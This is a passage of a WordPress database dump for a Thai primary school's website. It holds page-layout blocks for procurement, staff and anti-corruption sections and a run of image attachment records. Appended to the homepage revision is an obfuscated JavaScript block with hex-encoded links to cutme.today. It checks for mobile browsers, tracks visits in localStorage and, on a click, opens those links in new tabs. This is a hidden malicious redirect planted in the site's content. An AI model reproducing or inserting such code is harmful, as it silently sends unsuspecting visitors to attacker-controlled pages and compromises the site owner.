800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"postsPerPage\":\"2\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 12:01:18','2024-07-27 05:01:18','',14,'http://pakhaeng.ssk.in.th/?p=112',0,'revision','',0),
(114,1,'2024-07-27 12:01:50','2024-07-27 05:01:50','','448139628_966407788610226_7865904298730785944_n','','inherit','','closed','','448139628_966407788610226_7865904298730785944_n','','','2024-07-27 12:01:50','2024-07-27 05:01:50','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448139628_966407788610226_7865904298730785944_n.jpg',0,'attachment','image/jpeg',0),
(117,1,'2024-07-27 12:02:14','2024-07-27 05:02:14','','448248415_967051708545834_5547887755426689730_n','','inherit','','closed','','448248415_967051708545834_5547887755426689730_n','','','2024-07-27 12:02:14','2024-07-27 05:02:14','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448248415_967051708545834_5547887755426689730_n.jpg',0,'attachment','image/jpeg',0),
(120,1,'2024-07-27 12:02:37','2024-07-27 05:02:37','','448576570_969225221661816_9011581166762903674_n','','inherit','','closed','','448576570_969225221661816_9011581166762903674_n','','','2024-07-27 12:02:37','2024-07-27 05:02:37','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448576570_969225221661816_9011581166762903674_n.jpg',0,'attachment','image/jpeg',0),
(121,1,'2024-07-27 12:02:43','2024-07-27 05:02:43','','449112359_974870577763947_8285412201600408380_n','','inherit','','closed','','449112359_974870577763947_8285412201600408380_n','','','2024-07-27 12:02:43','2024-07-27 05:02:43','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449112359_974870577763947_8285412201600408380_n.jpg',0,'attachment','image/jpeg',0),
(124,1,'2024-07-27 12:03:10','2024-07-27 05:03:10','','449601269_976771944240477_531928953334737882_n','','inherit','','closed','','449601269_976771944240477_531928953334737882_n','','','2024-07-27 12:03:10','2024-07-27 05:03:10','',0,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449601269_976771944240477_531928953334737882_n.jpg',0,'attachment','image/jpeg',0),
(127,1,'2024-07-27 12:05:14','2024-07-27 05:05:14','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 